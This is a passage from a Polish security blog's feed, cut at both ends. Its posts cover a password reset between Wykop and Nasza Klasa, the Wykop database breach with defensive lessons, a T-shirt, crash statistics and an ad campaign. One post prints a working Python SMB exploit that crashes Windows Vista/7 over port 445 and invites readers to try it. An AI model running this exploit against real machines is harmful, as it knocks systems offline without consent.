Niepokojące w powyższym są dwie rzeczy: 1. &lt;b&gt;Wykop udostępnił moje dane&lt;/b&gt; firmie trzeciej (Naszej Klasie), bez mojej zgody (chociaż najprawdopodobniej będą się tłumaczyć, że dla mojego dobra). Najprawdopodobnie był to adres e-mail, ponieważ w obu serwisach miałem &lt;b&gt;inne loginy i hasła&lt;/b&gt;. W sumie, zastanawia mnie dlaczego nie wymienili się hashami :&amp;gt; (Nie odpowiadajcie, to pytanie retoryczne). Dobrze, że w Wykopowym profilu nie było pola na numer karty kredytowej, bo czułbym się teraz nieswojo...&lt;br&gt;
&lt;br&gt;
2. Nasza Klasa, jak dobra ciocia, zmieniła mi hasło i poprosiła o jego odzyskanie za pomocą standardowego formularza, do którego wklepać trzeba nie tylko swój e-mail, ale i &lt;b&gt;datę urodzenia&lt;/b&gt;. Osoby, które przy zakładaniu konta podały &quot;lewą&quot; datę (a kto nie podał?), będą miały &lt;b&gt;365 problemów&lt;/b&gt; :&amp;gt;&lt;br&gt;
&lt;br&gt;
Na plus Naszej Klasie można policzyć, że w treści e-maila nie dała linku do &quot;przypomnij hasło&quot; -- wtedy mielibyśmy piękny przykład &lt;b&gt;autophishingu&lt;/b&gt; ;) Niestety, z kontaktem do supportu, jak widać, już nie poszło im tak dobrze...&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Czy korelacja danych pomiędzy dwoma serwisami może być groźna?&lt;/h3&gt;
&lt;p&gt;Takie zachowanie w przypadku dwóch, powiedzmy sobie, małoistotnych dla mnie serwisów, w których po prostu miałem konto, jestem w stanie puścić płazem. Ale już &lt;del&gt;korelac&lt;/del&gt;&quot;wymiana danych&quot; na zasadzie &quot;porozumienia&quot; pomiędzy np. moim bankiem a serwisem &lt;b&gt;http://lubie.przebierac.sie.w.damksie.ciuszki.pl&lt;/b&gt; mocno by mnie wkurzyła... (kto wie, co w dzisiejszych czasach wpływa na zdolność kredytową :&amp;gt;)&lt;br&gt;
&lt;br&gt;
Niedawno głośno było o naukowcach, którzy zebrawszy dane na temat &quot;przyjaciół&quot; w różnych serwisach społecznościowych, byli wstanie określić, czy dwa konta z różnych serwisów to ta sama osoba...&lt;br&gt;
&lt;br&gt;
W temacie korelacji patrz też na przykład z naszego podwórka: blokowanie kont nieletnich na Allegro przy współpracy Naszej Klasy. Szerzej o tym napisał coldpeer w &lt;b&gt;komentarzu nr 8&lt;/b&gt; pod tym wpisem ;)&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Genialny Sposób na reklamę?&lt;/h3&gt;
&lt;p&gt;Całość wygląda trochę jak tandetna akcja reklamowa — Wykop chyba lubi jak jest o nim głośno... Ciekawe czy to znaczy, że będzie popełniał &lt;i&gt;fackupy&lt;/i&gt; jeden za drugim?&lt;br&gt;
&lt;br&gt;
A może właśnie odkryliśmy sposób na reklamę naszego serwisu wśród użytkowników Naszej Klasy? Dziś zakładam &lt;b&gt;superhiperserwis.pl&lt;/b&gt;, jutro wysyłam do NK maila, że mnie zhakowano, &lt;b&gt;źli hackerzy&lt;/b&gt; skopiowali bazę serwisu (jakie szczęście, że &lt;a href=&quot;http://blip.pl/s/16401121&quot;&gt;Policja odzyskała *wszystkie* jej kopie&lt;/a&gt; :&amp;gt;), i że wszyscy moi użytkownicy mieli też konto na NK. Następnego dnia NK zmienia wszystkim hasła, wysyłając mailing z nazwą mojego serwisu do milionów Polaków...&lt;br&gt;
&lt;br&gt;
P.S. Coraz poważniej zastanawiam się nad założeniem firmy doradczej — taki &lt;b&gt;Risk &amp;amp; Crisis Consulting&lt;/b&gt;. Jak widać, polskie firmy (Wykop, Nasza Klasa, a wcześniej Merlin, Allegro) zaczynają popełniać błędy związane z zarządzaniem ryzykiem i bezpieczeństwem — i to normalne — ale z profesjonalną &quot;obsługą incydentu&quot; (w mediach i nie mediach) jest zazwyczaj fatalnie... Są chętni? Pierwszych trzech klientów dostaje darmową obsługę ;)&lt;br&gt;
&lt;br&gt;
P.S.2: mcv dodał to do Wykopu, &lt;a href=&quot;http://www.wykop.pl/link/237600/czyzby-kolejny-fuckup-wykopu&quot;&gt;można kopnąć&lt;/a&gt;. BTW zawsze rozczulają mnie zakopy z powodem &quot;spam&quot;...&lt;/p&gt;
</description><pubDate>Sat, 19 Sep 2009 11:22:34 +0200</pubDate><guid>http://blog.konieczny.be/2009/09/19/nasza-klasa-zresetowala-mi-haslo-bo-wykop-jej-kazal/</guid><category>IT</category><category>ja</category><category>przekręty</category><category>security</category><category>Techblog</category><category>wykop</category><category>kryzys</category><category>ryzyko</category><category>bezpieczeństwo</category><category>nk</category><category>nasza klasa</category><category>hasło</category><category>reset</category></item><item><title>Fuck Google, Ask Me (Koszulka)</title><link>http://blog.konieczny.be/2009/09/17/fuck-google-ask-me-koszulka/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8180534/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8180534_c9169d9e3e.jpg&quot; width=&quot;468&quot; height=&quot;500&quot; alt=&quot;T-shirt: fuck google ask me&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
...i tym postem otwieram na blogu nowy cykl wpisów, o przewrotym tytule:&lt;br&gt;
&quot;&lt;b&gt;Czwartek z geekowym t-shirtem&lt;/b&gt;&quot;. Następny t-shirt już za tydzień ;-) PS Kupiłem ją na bazarze w Turcji, za 12USD, utargowawszy 3USD &quot;rabatu&quot; :-) Jestem posiadaczem wielu &quot;informatycznych&quot; koszulek (wszystkie poznacie niebawem), ale żadna z nich nie wzbudza takich entuzjastycznych reakcji wśród przechodniów jak tshirt z napisem &quot;&lt;i&gt;Fuck Google, Ask Me&lt;/i&gt;&quot; ;-)&lt;/p&gt;
</description><pubDate>Thu, 17 Sep 2009 20:32:20 +0200</pubDate><guid>http://blog.konieczny.be/2009/09/17/fuck-google-ask-me-koszulka/</guid><category>funny</category><category>google</category><category>IT</category><category>ja</category><category>t-shirt</category><category>koszulka</category><category>fuck</category><category>ask</category><category>me</category></item><item><title>Zawieś Vistę i Windows 7</title><link>http://blog.konieczny.be/2009/09/08/zawies-viste-i-windows-7/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8118160/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8118160_38b49e2a35_o.png&quot; width=&quot;500&quot; height=&quot;200&quot; alt=&quot;http___www.stealthcomputer.com_blog_wp-content_uploads_2008_04_windows_7.jpg&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
W sieci pojawił się pierwszy &lt;a href=&quot;http://rdir.pl/x21o&quot;&gt;exploit&lt;/a&gt;, pozwalający na zdalny atak wymierzony w systemy &lt;b&gt;Windows Vista i Windows 7&lt;/b&gt; (a jak niektórzy twierdzą, najprawdopodobniej i Windows Server 2008). Właściciele XP i Servera 2003 mogą spać spokojnie — te systemy są bezpieczne (przynajmniej w tym przypadku :-)&lt;br&gt;
&lt;br&gt;
Atak wykorzystuje błąd w nowym sterowniku obsługującym protokół SMB i jak mówią, pozwala &lt;b&gt;zawiesić&lt;/b&gt; komputer ofiary, poprzez wymalowanie na jej ekranie przepięknego &lt;acronym title=&quot;Blue Screen of Death&quot;&gt;B.S.O.D.&lt;/acronym&gt;. Piszę &quot;jak mówią&quot;, bo mnie nie udało się wywalić postawionej naprędce Visty Enterpise... Ale może Wam się uda — poniżej kod exploita: &lt;code&gt;#!/usr/bin/python&lt;br&gt;
&lt;br&gt;
from socket import socket&lt;br&gt;
from time import sleep&lt;br&gt;
&lt;br&gt;
host = &quot;IP_ADDR&quot;, 445&lt;br&gt;
buff = (&lt;br&gt;
&quot;\x00\x00\x00\x90&quot; # Begin SMB header: Session message&lt;br&gt;
&quot;\xff\x53\x4d\x42&quot; # Server Component: SMB&lt;br&gt;
&quot;\x72\x00\x00\x00&quot; # Negociate Protocol&lt;br&gt;
&quot;\x00\x18\x53\xc8&quot; # Operation 0x18 &amp;amp; sub 0xc853&lt;br&gt;
&quot;\x00\x26&quot;# Process ID High: --&amp;gt; :) normal operation should be &quot;\x00\x00&quot;&lt;br&gt;
&quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe&quot;&lt;br&gt;
&quot;\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54&quot;&lt;br&gt;
&quot;\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31&quot;&lt;br&gt;
&quot;\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00&quot;&lt;br&gt;
&quot;\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57&quot;&lt;br&gt;
&quot;\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61&quot;&lt;br&gt;
&quot;\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c&quot;&lt;br&gt;
&quot;\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c&quot;&lt;br&gt;
&quot;\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e&quot;&lt;br&gt;
&quot;\x30\x30\x32\x00&quot;&lt;br&gt;
)&lt;br&gt;
s = socket()&lt;br&gt;
s.connect(host)&lt;br&gt;
s.send(buff)&lt;br&gt;
s.close()&lt;br&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Obrona&lt;/h3&gt;
&lt;p&gt;Póki co, Microsoft (niespodzianka!) nie udostępnia żadnej łatki. Polecam więc zapobiegawczo wyłączyć obsługę SMB na swoich maszynach, albo przyciąć port 445... na dniach zapewne pojawi się wzmożony ruch na tym porcie.&lt;br&gt;
&lt;br&gt;
P.S. Jeśli komuś uda się wywalić jakiegoś Windowsa, klepnijcie komcia z wersją systemu.&lt;/p&gt;
</description><pubDate>Tue, 08 Sep 2009 20:43:51 +0200</pubDate><guid>http://blog.konieczny.be/2009/09/08/zawies-viste-i-windows-7/</guid><category>bugs</category><category>IT</category><category>security</category><category>Techblog</category><category>windows</category><category>vista</category><category>7</category><category>SMB</category><category>exploit</category><category>0day</category><category>microsoft</category></item><item><title>Hasła użytkowników Wykop.pl wyciekły</title><link>http://blog.konieczny.be/2009/09/05/hasla-uzytkownikow-wykop-pl-wyciekly/</link><description>&lt;p&gt;&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8095111/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8095111_5e2f18e837_o.png&quot; width=&quot;500&quot; height=&quot;170&quot; alt=&quot;Wykop&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Dziś &lt;a href=&quot;http://www.wykop.pl/link/232212/wyciekla-baza-danych-wykopu&quot;&gt;okazało się&lt;/a&gt;, że&lt;/p&gt;
&lt;del&gt;pół roku&lt;/del&gt;
&lt;p&gt;kilka tygodni temu* (sic!) z Wykopu udało się ściągnąć &lt;b&gt;kompletną bazę danych&lt;/b&gt; (&lt;i&gt;w tym hasła użytkowników&lt;/i&gt;). Administracja Wykopu nie wspomniała o tym ani słowa, tłumacząc się teraz &lt;a href=&quot;http://www.wykop.pl/ramka/232404/oficjalne-oswiadczenie-administracji-wykopu&quot;&gt;dość mętnie&lt;/a&gt; &quot;dobrem śledztwa&quot;. Nie ma się co dziwić, nikt nie lubi się przyznawać do błędów. Szkoda tylko, że administratorzy Wykopu nie ostrzegli kilkudziesięciu tysięcy swoich użytkowników, że ktoś ma ich hasła i należałoby je zmienić, zwłaszcza w innych serwisach, jeśli (nierozsądnie) wszędzie wykorzystują to samo hasło...&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Jak doszło do włamania?&lt;/h3&gt;
&lt;p&gt;Do wycieku bazy doszło poprzez włamanie nie na główny serwer Wykopu, ale na jedną z deweloperskich (służących do testów) maszyn... Prześledźmy zatem, co poszło nie tak, i jakie błędy popełniła załoga Wykopu.&lt;/p&gt;
&lt;blockquote&gt;Mam nadzieję, że ten case-study będzie świetną przestrogą dla wszystkich startupów, a także dobrym wyjaśnieniem tego co się stało, dla tych, którzy nie mają zbyt wielkiej wiedzy w temacie bezpieczeństwa komputerowego i czytając komentarze dotyczące włamania na Wykop.pl, nie wiedzą komu ufać i kto mówi prawdę.&lt;/blockquote&gt;
&lt;p&gt;
&lt;h3&gt;Czego Wykop (i wy) nie powiniście robić&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;1. Nie trzymaj serwerów deweloperskich na publicznych adresach IP&lt;/b&gt;. Naprawdę łatwo można poznać ile (i jakich) adresów IP należy do danej organizacji. Wystarczy odpytać bazę &lt;a href=&quot;http://ripe.net/&quot;&gt;Whois&lt;/a&gt;.&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8095233/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8095233_569fdbcb68_o.png&quot; width=&quot;500&quot; height=&quot;81&quot; alt=&quot;Terminal — bash — 145×45&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;b&gt;2. Filtruj dostęp do usług, które nie są wymagane do działania serwisu.&lt;/b&gt; Jeśli ktoś pozna adresy IP należące do Wykopu (patrz punkt 1) może je przeskanować za pomocą chociażby nmapa, aby dowiedzieć się jakie usługi są udostępniane, w których wersjach i czy w którejś z nich wykryto jakieś dziury...&lt;br&gt;
Rozumiem, że SSH, czy FTP mogą znacznie ułatwić testowanie/konfigurację webaplikacji, ale &lt;b&gt;nie powinny one być dostępne dla każdego internauty!&lt;/b&gt;. Serwery deweloperskie należy trzymać &quot;za firewallem&quot; - dostęp zewnątrz tylko z tzw. białej listy, przez VPN/SSH.&lt;br&gt;
&lt;br&gt;
&lt;b&gt;3. Zmieniaj domyślne hasła (i konfigurację serwera).&lt;/b&gt; Bo inaczej spotka Cię &lt;a href=&quot;http://www.phenoelit-us.org/dpl/dpl.html&quot;&gt;kara&lt;/a&gt;. Wykop postawił na wygodę - żadnego filtrowania - programiści mogli testować serwis z domu, pociągu, kawiarenki internetowej, a nawet iPhone'a siedząc na kibelku ;) Ale Wykop wygodę zrozumiał dość frywolnie, bo oprócz braku restrykcji w dostępie do serwera, &lt;b&gt;nie ustawiono nawet hasła dla konta administratora&lt;/b&gt; bazy danych... i to właśnie doprowadziło do włamania.&lt;/p&gt;
&lt;blockquote&gt;&lt;b&gt;Nikt nie musiał odpalać żadnych exploitów lub łamać haseł -- ich po prostu nie było!&lt;/b&gt;&lt;/blockquote&gt;
&lt;p&gt;&lt;b&gt;4. Nie wrzucaj produkcyjnej bazy na testowy serwer.&lt;/b&gt; To jest wielkie no-no. Naprawdę warto poświęcić nawet kilka godzin, aby wygenerować testowe dane. To nic w porównaniu z tym, co może się stać, jeśli przeniesie się oryginalną bazę z serwera produkcyjnego na testowy, czyli luźniej skonfigurowany, i przez to łatwiejszy do zaatakowania, bo często z włączonymi komunikatami błędów i nie tak mocną polityką bezpieczeństwa. To posłało na dno jedną z &lt;a href=&quot;http://www.google.com/url?sa=t&amp;amp;source=web&amp;amp;ct=res&amp;amp;cd=1&amp;amp;url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2005%2F06%2F17%2FAR2005061701031.html&amp;amp;ei=hKaiSua3L5eG_Aaqi4G_CQ&amp;amp;usg=AFQjCNGgYUiN05fhj4Us_CokMxN1FwmOKw&amp;amp;sig2=5U6mRCEZHAfSiNRAndkeFg&quot; rel=&quot;nofollow&quot;&gt;instytucji finansowych&lt;/a&gt; (sprawdzających swoją webaplikację na prawdziwych numerach kart kredytowych swoich klientów), a &lt;b&gt;w przypadku Wykopu umożliwiło pobranie haseł użytkowników&lt;/b&gt;.&lt;br&gt;
&lt;br&gt;
&lt;b&gt;5. &quot;Posól&quot; hasła użytkowników&lt;/b&gt;. Na szczęście, Wykop hasła użytkowników trzymał w postaci hashy SHA1 (&lt;i&gt;w przeciwieństwie do innego dużego i bardziej znanego Polakom polskiego portalu, który swoje hasła trzyma w bazie &lt;b&gt;jawnym&lt;/b&gt; tekstem...&lt;/i&gt;).&lt;br&gt;
Używanie funkcji skrótu przy zapisie haseł &lt;b&gt;pomaga, ale nie eliminuje&lt;/b&gt; możliwości poznania hasła! Hashe można &quot;odwrócić&quot; za pomocą ataków &lt;a href=&quot;http://pl.wikipedia.org/wiki/Atak_brute_force&quot; rel=&quot;nofollow&quot;&gt;brute-force&lt;/a&gt; (próba hashowania hasła a, aa, aaa, aab, aac, etc. i porównania wyniku z tym co w bazie) lub tzw. &lt;a href=&quot;http://pl.wikipedia.org/wiki/T%C4%99czowe_tablice&quot; rel=&quot;nofollow&quot;&gt;Rainbow Tables&lt;/a&gt; (czyli skorzystania z już obliczonego słownika skrótów i porównania ich przechwyconymi). Oba &lt;b&gt;ataki byłyby trudniejsze, gdyby hasła użytkowników były &quot;solone&quot;&lt;/b&gt; (do hasła użytkownika, przed hashowaniem, dołączany jest &lt;a href=&quot;http://en.wikipedia.org/wiki/Salt_(cryptography)&quot; rel=&quot;nofollow&quot;&gt;prefiks&lt;/a&gt;). W implementacji banalne, a zdecydowanie podnosi bezpieczeństwo hasła.&lt;br&gt;
&lt;br&gt;
&lt;b&gt;6. Nie używaj tego samego hasła na różnych serwisach!!!&lt;/b&gt; To co prawda nie rada dla Wykopu, ale dla jego użytkowników. Jeśli używali tego samego hasła do konta pocztowego (które również jest w rękach włamywaczy) czy innego serwisu, to mają problem. Niektórym już pojawiły się niechciane przedmioty w &quot;Kupionych&quot; na Allegro...&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8095492/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8095492_b569ef23e9.jpg&quot; width=&quot;500&quot; height=&quot;274&quot; alt=&quot;&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Naprawdę, to &lt;b&gt;nie jest trudne ułożyć sobie silne, a zarazem łatwe do zapamiętania hasło&lt;/b&gt; dla każdego z serwisów. Wystarczy zbudować je wg poniższego schematu:&lt;/p&gt;
&lt;blockquote&gt;niebieska 8!8 rekawiczka&lt;/blockquote&gt;
&lt;p&gt;Dwa słowa, odzielone liczbą lub znakiem specjalnym. Takie hasło jest niesłownikowe, długie, i łatwe do zapamiętania. To naprawdę &lt;b&gt;najlepszy kompromis&lt;/b&gt; pomiędzy bezpieczeństwem a pamięcią potrzebną do przechowania hasła.&lt;br&gt;
&lt;br&gt;
Polityka posiadania długich, losowych haseł, które w dodatku trzeba zmieniać co 2 tyg. jest w moim odczuciu &lt;b&gt;głupia&lt;/b&gt;. Większośc użytkowników nie jest w stanie zapamiętać takiego hasła, co skutkuje tzw. &lt;i&gt;słonecznikiem&lt;/i&gt; — czyli zapisaniem hasła na żółtej karteczce i przyklejeniem jej do monitora...&lt;/p&gt;
&lt;h3&gt;Druga strona włamania&lt;/h3&gt;
&lt;p&gt;Oprócz haseł użytkowników, z wyciekniętej bazy można dowiedzieć się innych interesujących rzeczy - chociażby adresu e-mail (prawdziwego?) administratora, który odkrywa demaskuje swój drugi biznes, a także jego hasła - porównajcie hash SHA1 dla &quot;&lt;b&gt;qwerty&lt;/b&gt;&quot; wyliczony &lt;a href=&quot;http://www.tools4noobs.com/online_php_functions/sha1/&quot;&gt;tutaj&lt;/a&gt; z obrazkiem poniżej:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/photos/konieczny/8095555/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/8095555_81ce50593c_o.png&quot; width=&quot;494&quot; height=&quot;28&quot; alt=&quot;&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Wyciek haseł to nie jedyny problem, bo jak widać, z bazy można wywnioskować o wiele więcej...&lt;br&gt;
&lt;br&gt;
&lt;b&gt;AKTUALIZACJA (7/9/2009)&lt;/b&gt;&lt;br&gt;
Właściciel Wykopu opublikował swoje oświadczenie w sprawie włamania na &lt;a href=&quot;http://www.youtube.com/watch?v=zvMjo-GVu5g&quot;&gt;YouTube&lt;/a&gt;. Niestety, nie jest ono bogate w nowe informacje.&lt;br&gt;
&lt;br&gt;
____&lt;br&gt;
&lt;small&gt;* Przechwycona baza pochodzi sprzed pół roku. Dokładna data włamania nie została określona — ale jeśli wierzyć administratorom Wykopu, było to &quot;kilka tygodni temu&quot;.&lt;/small&gt;&lt;/p&gt;
</description><pubDate>Sat, 05 Sep 2009 21:37:29 +0200</pubDate><guid>http://blog.konieczny.be/2009/09/05/hasla-uzytkownikow-wykop-pl-wyciekly/</guid><category>IT</category><category>przekręty</category><category>security</category><category>Techblog</category><category>wykop</category><category>hacked</category><category>wyciek</category><category>baza danych</category><category>hasła</category><category>wykop.pl</category></item><item><title>Katastrofy lotnicze - jak ich uniknąć?</title><link>http://blog.konieczny.be/2009/08/16/katastrofy-lotnicze-jak-ich-uniknac/</link><description>&lt;p&gt;Zestawienie, przedstawiająca statystycznie &lt;b&gt;najniebezpieczniejsze lotniska&lt;/b&gt;, modele samolotów, miejsca w kabinie oraz daty lotów...&lt;br&gt;
&lt;br&gt;
W skrócie, &lt;b&gt;aby uniknąć katastrofy lotniczej&lt;/b&gt;, nie lataj Boeingiem 737, zwłaszcza w sierpniu i do USA. Zajmuj tylko miejsca z tyłu i wystrzegaj się linii Aeroflot. Matematka nie kłamie ;-) &lt;small&gt;&lt;i&gt;kliknij w obrazek, aby zobaczyć pełnowymiarową grafikę&lt;/i&gt;&lt;/small&gt;&lt;br&gt;
&lt;a href=&quot;http://konieczny.be/geekfun/plane_crash.gif&quot;&gt;&lt;img src=&quot;http://blog.konieczny.be/files/plane_crash_500.gif&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;small&gt;&lt;i&gt;źródło: Reddit&lt;/i&gt;&lt;/small&gt;&lt;br&gt;
&lt;br&gt;
PS O &lt;a href=&quot;http://blog.konieczny.be/2006/01/24/czy-strong-komorka-strong-powoduje-b-katastrofy-lotnicze-b/&quot;&gt;wypadkach lotniczych&lt;/a&gt; już kiedyś pisałem, w kontekście telefonów komórkowych...&lt;/p&gt;
</description><pubDate>Sun, 16 Aug 2009 22:06:56 +0200</pubDate><guid>http://blog.konieczny.be/2009/08/16/katastrofy-lotnicze-jak-ich-uniknac/</guid><category>IT</category><category>lifehacking</category><category>porady</category><category>security</category><category>życie</category><category>katastrofa</category><category>lotnicza</category><category>katastrofy</category><category>wypadki</category><category>samoloty</category></item><item><title>AdTaily - gdzie warto się reklamować?</title><link>http://blog.konieczny.be/2009/08/14/adtaily-gdzie-warto-sie-reklamowac/</link><description>&lt;p&gt;Parę dni temu, kiedy oficjalnie &lt;a href=&quot;http://blog.konieczny.be/2009/08/04/nowy-geekfun/&quot;&gt;wystartował Geek*FUN*&lt;/a&gt;, nadarzyła się dobra okazja żeby wypróbować AdTaily nie jako bloger, a jako reklamodawca.&lt;br&gt;
&lt;br&gt;
Poprzez katalogi tematyczne wybrałem kilkanaście stron, na których umieściłem reklamę. Zaglądałem tylko do kategorii Apple, Komputer i Internet, Studenci, Młodzież, Rozrywka, bo moim zdaniem właśnie tam znajduje się target Geek*FUN*-a.&lt;br&gt;
&lt;br&gt;
Po przejrzeniu setek blogów, wybrałem tylko i wyłącznie te, które miały &lt;b&gt;jak najniższą cenę za reklamę w stosunku do raportowanej liczby odwiedzin&lt;/b&gt;. W końcu to test, więc po co przepłacać? Zwłaszcza, że Geek*FUN* jest totalnie nonprofitowy. Generalnie, nie brałem pod uwagę cen wyższych niż 2PLN za dzień wyświetlania reklamy.&lt;br&gt;
&lt;br&gt;
Pozostało stworzyć odpowiednią grafikę i spersonalizować jej opis pod każdy z serwisów: &quot;Umrzyj ze śmiechu&quot; na emoforum.pl wyglądało moim zdaniem dość&amp;nbsp;zabawnie...&lt;br&gt;
&lt;br&gt;
&lt;img src=&quot;http://konieczny.be/skitch/geekfun_ad.png-20090814-093836.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;
&lt;h3&gt;Kupowanie reklam w AdTaily&lt;/h3&gt;
&lt;p&gt;Proces kupowania reklamy jest &lt;b&gt;banalnie prosty&lt;/b&gt;... ale pojawiły się pewne problemy. Pomimo błyskawicznego zaakceptowania reklamy przez kilku blogerów, nie pokazywała się ona niektórych sajtach... Jak się okazało, winne było cache'owanie... i tu z pomocą przyszedł &lt;a href=&quot;http://blog.7tonlnu.pl&quot;&gt;sharnik&lt;/a&gt;, który zrobił swoją magię i Geek*FUN* zaczął straszyć na wszystkich stronach.&lt;br&gt;
&lt;br&gt;
Druga rzecz, która mnie wydała się problematyczna, to brak panelu dla osoby sprzedającej reklamy. Chciałbym widzieć &lt;b&gt;statystyki&lt;/b&gt; dotyczące moich reklam bezpośrednio w AdTaily. Na szczęście, z tego co mi wiadomo, funkcja taka jest w planach — i całe szczęście, bo parsowanie logów http nie jest moim ulubionym zajęciem:&lt;br&gt;
&lt;br&gt;
&lt;a href=&quot;http://www.zooomr.com/z/photos/zoom/7961283/size-32/&quot; title=&quot;Photo Sharing&quot;&gt;&lt;img src=&quot;http://static.zooomr.com/images/7961283_b9a01fa49d.jpg&quot; width=&quot;500&quot; height=&quot;174&quot; alt=&quot;term&quot;&gt;&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
Trzecia sprawa, to zero opisu co do &lt;b&gt;powodu refundów&lt;/b&gt;. Nagle dostaję zwrot X PLN, i nie wiem dlaczego. Czyżby moja reklama się nie spodobała? A może autor bloga zapił i przez trzy dni nie był w stanie zaakceptować reklamy? &lt;a href=&quot;http://www.blogomotive.pl/&quot;&gt;Blogomotive&lt;/a&gt; był na tyle miły, że po odrzuceniu mojej reklamy, sam wygooglał mojego e-maila i napisał, że powodem było wybranie zbyt wielu dni — ale czy wszyscy będą tacy uprzejmi? ;)&lt;br&gt;
&lt;br&gt;
Dobra, koniec narzekania, przechodzimy do wyników kampanii ;-)&lt;/p&gt;
&lt;h3&gt;Statystyki kampanii na AdTaily&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;http://konieczny.be/skitch/AdTaily.numbers-20090814-102033.png&quot;&gt;&lt;br&gt;
&lt;br&gt;
Jak widać, najwięcej kliknięć pochodzi ze wszelkiego rodzaju for dyskusyjnych, gdzie za jedną przekierowaną na naszą stronę osobę zapłacimy średnio ok. &lt;b&gt;5 groszy&lt;/b&gt;. Pewien serwis, którego nazwy teraz nie zdradzę, wypadł&amp;nbsp;zadziwiająco dobrze - za 98 kliknięć zapłaciłem 1,5PLN, co dało genialny CPC na poziomie &lt;b&gt;półtora grosza&lt;/b&gt; :) Kto zgadnie, o jakim serwisie mowa? Kupię mu tam reklamę na dzień ;P&lt;br&gt;
&lt;br&gt;
Na tle reszty, rozczarowały emokidsy (ale tą niechęć można zrozumieć ;-) i fanatycy gier flashowych — ponad 80 groszy za kliknięcie w porównaniu do reszty testowanych stron to porażka. Usilnie &lt;del&gt;spamo&lt;/del&gt;reklamowany na blipie &lt;a href=&quot;http://livespot.pl&quot;&gt;livespot&lt;/a&gt; też okazał się ...przereklamowany :)&lt;br&gt;
&lt;br&gt;
Najkorzystniejszą cenowo opcją jest obecnie reklama na &lt;a href=&quot;http://blogomotive.pl&quot;&gt;Blogomotive&lt;/a&gt; — ale trzeba pamiętać, że jest to tymczasowa promocja. Ciekaw jestem, czy tyle samo osób będzie chętnych na reklamę po podniesieniu stawki?&lt;br&gt;
&lt;br&gt;
W dniu emisji reklam, liczba czytelników &lt;a href=&quot;http://feeds.feedburner.com/geekfunfeed&quot;&gt;RSS GeekFUN-a&lt;/a&gt; wzrosła o &lt;b&gt;15&lt;/b&gt;. Pytanie, czy warto wydać ~20PLN na taki przyrost? To pozostawię Wam do rozważań ;-)&lt;/p&gt;
&lt;h3&gt;Gdzie się reklamować?&lt;/h3&gt;
&lt;p&gt;Osobiście, &lt;b&gt;eksperyment z AdTaily uważam za udany&lt;/b&gt; — dowiedziałem się czegoś nowego o sieci i klikalności reklam przez różne grupy internautów. Wydaje mi się, że &lt;b&gt;na AdTaily najlepiej sprawdzi się&lt;/b&gt; mimo wszystko &lt;b&gt;reklama wizerunkowa&lt;/b&gt;. Nawet jeśli nikt nie kliknie (takich jest sporo) ale zobaczy daną kreację na kilkunastu blogach które codziennie przegląda (takich jest jeszcze więcej), efekt końcowy zostanie osiągnięty.&lt;br&gt;
&lt;br&gt;
Wniosek? Wrzucać reklamy na popularne strony/blogi z &lt;b&gt;dużą oglądalnością&lt;/b&gt; i nie przejmować się brakiem kliknięć. Pokuszę się o stwierdzenie, że reklama niekliknięta jest równie skuteczna, co kliknięta. Ja do teraz pamiętam reklamę Heyah, bo mimo że w nią nie kliknąłem, to widziałem ją w kilkunastu miejscach przez dłuuugi czas...&lt;/p&gt;
</description><pubDate>Fri, 14 Aug 2009 09:58:49 +0200</pubDate><guid>http://blog.konieczny.be/2009/08/14/adtaily-gdzie-warto-sie-reklamowac/</guid><category>IT</category><category>porady</category><category>reklamy</category><category>adtaily</category><category>reklama</category><category>CPC</category><category>blogi</category></item><item><title>Nowy *GeekFUN* </title><link>http://blog.konieczny.be/2009/08/04/nowy-geekfun/</link><description>&lt;p&gt;&lt;img src=&quot;http://konieczny.be/skitch/geekfun-20090804-204044.png&quot;&gt;&lt;br&gt;
&lt;br&gt;
